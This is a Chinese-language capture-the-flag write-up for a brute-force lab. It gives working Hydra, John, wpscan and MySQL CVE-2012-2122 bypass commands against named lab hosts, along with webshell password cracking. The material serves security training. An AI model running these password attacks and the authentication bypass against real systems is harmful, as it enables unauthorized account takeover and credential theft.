暴力破解 安鸾 Writeup

• 前三题可以使用hydra进行破解
  
  hydra使用教程 https://www.cnblogs.com/zhaijiahui/p/8371336.html

D:\soft\hydra-windows>hydra.exe
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
通用：hydra <参数> <IP地址> <服务名>

Options（参数选项）:
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户，对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写，指定密码破解，少用，一般是采用密码字典。
-P FILE 大写，指定密码字典。
-e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探。
-C FILE 使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数，默认为16。
-w TIME 设置最大超时的时间，单位秒，默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名，支持的服务和协议：telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。

推荐一份 爆破账户密码字典

• ftp服务破解
  
  IP:118.190.133.35
  
  hydra -L Ftp/Username.txt -P top100pass.txt ftp://118.190.133.35

• telnet服务破解
  
  domain:
  
  www.whalwl.icu
  
  port:
  
  2323
  
  hydra -L Telnet/Username.txt -P top100password.txt telnet://www.whalwl.icu:2323/

• Mysql暴力破解
  
  IP：118.190.133.35
  
  PORT：3308
  
  Mysql 身份认证绕过漏洞（CVE-2012-2122）
  
  当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。按照公告说法大约256次就能够蒙对一次。

for i in `seq 1 1000`; do mysql -uroot -pwrong -h 118.190.133.35 -P3308 ; done

• 登陆表单破解
  
  http://whalwl.icu:8088/
  
  先使用burp sutie 爆破用户名再爆破密码。

• 一句话密码破解
  
  获取shell地址 http://whalwl.icu:8089/robots.txt
  
  使用K8_FuckOneShell进行破解一句话密码
  
  http://whalwl.icu:8089/.webconsole.php

• SSH离线破解
  
  使用jonn进行破解
  
  破解shadow教程 https://blog.csdn.net/whatday/article/details/108202191
  
  john --w:john_dict.txt --format=sha512crypt shadow

• wordpress后台破解
  
  wpscan枚举用户名：
  
  wpscan --url http://whalwl.icu:8090/ --enumerate u
  
  获取的用户名破解密码：
  
  wpscan --url http://whalwl.icu:8090/ --usernames 'whalwlweb' -P /root/dict.txt